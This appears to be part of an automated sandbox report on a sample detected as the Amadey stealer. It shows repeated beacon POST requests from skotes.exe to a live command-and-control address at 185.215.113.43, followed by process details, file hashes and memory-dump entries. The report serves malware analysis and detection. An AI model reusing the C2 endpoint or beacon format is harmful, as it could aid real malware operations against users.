                                      Data Ascii: st=s
                                      Oct 24, 2024 08:39:35.783488035 CEST219INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Thu, 24 Oct 2024 06:39:35 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Refresh: 0; url = Login.php
                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 1 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      13192.168.2.649996185.215.113.43806768C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 08:39:37.369391918 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.43
                                      Content-Length: 160
                                      Cache-Control: no-cache
                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 37 32 45 37 36 42 31 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B72E76B15182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                      Oct 24, 2024 08:39:38.278177977 CEST196INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Thu, 24 Oct 2024 06:39:38 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 7 <c><d>0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      14192.168.2.649997185.215.113.43806768C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 08:39:39.913351059 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.43
                                      Content-Length: 4
                                      Cache-Control: no-cache
                                      Data Raw: 73 74 3d 73
                                      Data Ascii: st=s
                                      Oct 24, 2024 08:39:40.811969042 CEST219INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Thu, 24 Oct 2024 06:39:40 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Refresh: 0; url = Login.php
                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 1 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      15192.168.2.649998185.215.113.43806768C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 08:39:42.321806908 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.43
                                      Content-Length: 160
                                      Cache-Control: no-cache
                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 37 32 45 37 36 42 31 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B72E76B15182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                      Oct 24, 2024 08:39:43.239566088 CEST196INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Thu, 24 Oct 2024 06:39:43 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 7 <c><d>0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      16192.168.2.649999185.215.113.43806768C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 08:39:44.866781950 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.43
                                      Content-Length: 4
                                      Cache-Control: no-cache
                                      Data Raw: 73 74 3d 73
                                      Data Ascii: st=s
                                      Oct 24, 2024 08:39:45.780369043 CEST219INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Thu, 24 Oct 2024 06:39:45 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Refresh: 0; url = Login.php
                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 1 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      17192.168.2.650001185.215.113.43806768C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 08:39:47.289036036 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.43
                                      Content-Length: 160
                                      Cache-Control: no-cache
                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 37 32 45 37 36 42 31 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B72E76B15182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                      Oct 24, 2024 08:39:48.215714931 CEST196INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Thu, 24 Oct 2024 06:39:48 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 7 <c><d>0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      18192.168.2.650002185.215.113.43806768C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 08:39:49.850935936 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.43
                                      Content-Length: 4
                                      Cache-Control: no-cache
                                      Data Raw: 73 74 3d 73
                                      Data Ascii: st=s
                                      Oct 24, 2024 08:39:50.839905977 CEST219INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Thu, 24 Oct 2024 06:39:50 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Refresh: 0; url = Login.php
                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 1 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      19192.168.2.650003185.215.113.43806768C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 08:39:52.353543997 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.43
                                      Content-Length: 160
                                      Cache-Control: no-cache
                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 37 32 45 37 36 42 31 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B72E76B15182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                      Oct 24, 2024 08:39:53.270018101 CEST196INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Thu, 24 Oct 2024 06:39:53 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 7 <c><d>0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      20192.168.2.650004185.215.113.43806768C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 08:39:54.897938967 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.43
                                      Content-Length: 4
                                      Cache-Control: no-cache
                                      Data Raw: 73 74 3d 73
                                      Data Ascii: st=s
                                      Oct 24, 2024 08:39:55.798255920 CEST219INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Thu, 24 Oct 2024 06:39:55 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Refresh: 0; url = Login.php
                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 1 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      21192.168.2.650005185.215.113.43806768C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 08:39:57.335879087 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.43
                                      Content-Length: 160
                                      Cache-Control: no-cache
                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 37 32 45 37 36 42 31 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B72E76B15182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                      Oct 24, 2024 08:39:58.253169060 CEST196INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Thu, 24 Oct 2024 06:39:58 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 7 <c><d>0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      22192.168.2.650006185.215.113.43806768C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 08:39:59.888361931 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.43
                                      Content-Length: 4
                                      Cache-Control: no-cache
                                      Data Raw: 73 74 3d 73
                                      Data Ascii: st=s
                                      Oct 24, 2024 08:40:00.794399023 CEST219INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Thu, 24 Oct 2024 06:40:00 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Refresh: 0; url = Login.php
                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 1 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      23192.168.2.650007185.215.113.43806768C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 08:40:02.305821896 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.43
                                      Content-Length: 160
                                      Cache-Control: no-cache
                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 37 32 45 37 36 42 31 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B72E76B15182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                      Oct 24, 2024 08:40:03.204879045 CEST196INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Thu, 24 Oct 2024 06:40:03 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 7 <c><d>0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      24192.168.2.650008185.215.113.43806768C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 08:40:04.838192940 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.43
                                      Content-Length: 4
                                      Cache-Control: no-cache
                                      Data Raw: 73 74 3d 73
                                      Data Ascii: st=s
                                      Oct 24, 2024 08:40:05.755461931 CEST219INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Thu, 24 Oct 2024 06:40:05 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Refresh: 0; url = Login.php
                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 1 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      25192.168.2.650009185.215.113.43806768C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 08:40:07.307215929 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.43
                                      Content-Length: 160
                                      Cache-Control: no-cache
                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 37 32 45 37 36 42 31 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B72E76B15182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                      Oct 24, 2024 08:40:08.226078987 CEST196INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Thu, 24 Oct 2024 06:40:08 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 7 <c><d>0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      26192.168.2.650010185.215.113.43806768C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 08:40:10.064454079 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.43
                                      Content-Length: 4
                                      Cache-Control: no-cache
                                      Data Raw: 73 74 3d 73
                                      Data Ascii: st=s
                                      Oct 24, 2024 08:40:10.964411020 CEST219INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Thu, 24 Oct 2024 06:40:10 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Refresh: 0; url = Login.php
                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 1 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      27192.168.2.650011185.215.113.43806768C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 08:40:12.478023052 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.43
                                      Content-Length: 160
                                      Cache-Control: no-cache
                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 37 32 45 37 36 42 31 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B72E76B15182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                      Oct 24, 2024 08:40:13.396465063 CEST196INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Thu, 24 Oct 2024 06:40:13 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 7 <c><d>0


                                      Click to jump to process

                                      Click to jump to process

                                      Click to dive into process behavior distribution

                                      Click to jump to process

                                      Target ID:0
                                      Start time:02:38:06
                                      Start date:24/10/2024
                                      Path:C:\Users\user\Desktop\msqT9atzYW.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\msqT9atzYW.exe"
                                      Imagebase:0xbe0000
                                      File size:1'996'800 bytes
                                      MD5 hash:B2F874F58722F67061A01726F43CE570
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.2266387478.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.2226138822.0000000005240000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      Target ID:2
                                      Start time:02:38:08
                                      Start date:24/10/2024
                                      Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                      Imagebase:0xf60000
                                      File size:1'996'800 bytes
                                      MD5 hash:B2F874F58722F67061A01726F43CE570
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.2299648103.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.2258806341.00000000051F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 58%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      Target ID:3
                                      Start time:02:38:10
                                      Start date:24/10/2024
                                      Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                      Imagebase:0xf60000
                                      File size:1'996'800 bytes
                                      MD5 hash:B2F874F58722F67061A01726F43CE570
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000003.2271001764.0000000005790000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.2311270072.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      Target ID:7
                                      Start time:02:39:00
                                      Start date:24/10/2024
                                      Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                      Imagebase:0xf60000
                                      File size:1'996'800 bytes
                                      MD5 hash:B2F874F58722F67061A01726F43CE570
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000007.00000003.2764127770.00000000050B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:false

                                      Reset < >
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2268575722.0000000005450000.00000040.00001000.00020000.00000000.sdmp, Offset: 05450000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5450000_msqT9atzYW.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Nn&
                                        • API String ID: 0-1642774232
                                        • Opcode ID: e72aa50ef271b552c9976115795242cfb0301c8709258d72be0297edb8d72193
                                        • Instruction ID: 981bf091e56936aeb14bc206eed0de0bc3f8041bfc2725251003849c1df2cdaa
                                        • Opcode Fuzzy Hash: e72aa50ef271b552c9976115795242cfb0301c8709258d72be0297edb8d72193
                                        • Instruction Fuzzy Hash: 9011F8EF1891257E7142D4826F1CEFA276EE1D6770331C82BF80AC6107E2954A4F6575
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2268575722.0000000005450000.00000040.00001000.00020000.00000000.sdmp, Offset: 05450000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5450000_msqT9atzYW.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Nn&
                                        • API String ID: 0-1642774232
                                        • Opcode ID: 23b6ee32627038a35434d94651c58adc2e6fb484171595c23d96903fff21eaea
                                        • Instruction ID: 626d35eff0fcf0a178dd1351bb10a5b2e283c4f9f8b0e7fad72d3813aff57757
                                        • Opcode Fuzzy Hash: 23b6ee32627038a35434d94651c58adc2e6fb484171595c23d96903fff21eaea
                                        • Instruction Fuzzy Hash: 8C113AEF1891217E7102D1826F28EF7272EE1D2730731C827F84AC6107E2954A4F6172
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2268575722.0000000005450000.00000040.00001000.00020000.00000000.sdmp, Offset: 05450000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5450000_msqT9atzYW.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Nn&
                                        • API String ID: 0-1642774232
                                        • Opcode ID: abbb557e8dc5fcf059ae156186125c989ccf42f65287c38f2f9fd9d29c010500
                                        • Instruction ID: 97755b7ce9d37bb703db1f66a90d998f06ba80ee061cedb4736c4cb8de4e7948
                                        • Opcode Fuzzy Hash: abbb557e8dc5fcf059ae156186125c989ccf42f65287c38f2f9fd9d29c010500
                                        • Instruction Fuzzy Hash: 5711F5EF2892217E7212D5826F18EF7676EE1D6730331C82BF84BC6106E2954A4F6535
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2268575722.0000000005450000.00000040.00001000.00020000.00000000.sdmp, Offset: 05450000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5450000_msqT9atzYW.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Nn&
                                        • API String ID: 0-1642774232
                                        • Opcode ID: 30485eeb6f5a63fc5828145370d978116220cc5f55d22c587aced06f416f624d
                                        • Instruction ID: 54d0174289a16f214f7b92b63426c7b8cca4b1aa821b6dc7057a61680bbf2a2c
                                        • Opcode Fuzzy Hash: 30485eeb6f5a63fc5828145370d978116220cc5f55d22c587aced06f416f624d
                                        • Instruction Fuzzy Hash: A7115AEF1891257E7202D4866F1CEFA272EE4C6730734C82BFC06CA107E2958A4F6631
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2268575722.0000000005450000.00000040.00001000.00020000.00000000.sdmp, Offset: 05450000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5450000_msqT9atzYW.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Nn&
                                        • API String ID: 0-1642774232
                                        • Opcode ID: 0ffceb844df0a82db497a93214b09cbee27b959a127bc8d1bfd42257fb8bf5cb
                                        • Instruction ID: 8e2e2b977a32b5e066fa3fed4b3e0e205460e83eccbce9d0ec72dd5397e563a1
                                        • Opcode Fuzzy Hash: 0ffceb844df0a82db497a93214b09cbee27b959a127bc8d1bfd42257fb8bf5cb
                                        • Instruction Fuzzy Hash: F70129EF2491217E7112D4866F2C9FB276EE1D2730335C82BFC4ACA107E295894F6571
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2268575722.0000000005450000.00000040.00001000.00020000.00000000.sdmp, Offset: 05450000, based on PE: false
                                        Joe Sandbox IDA Plugin
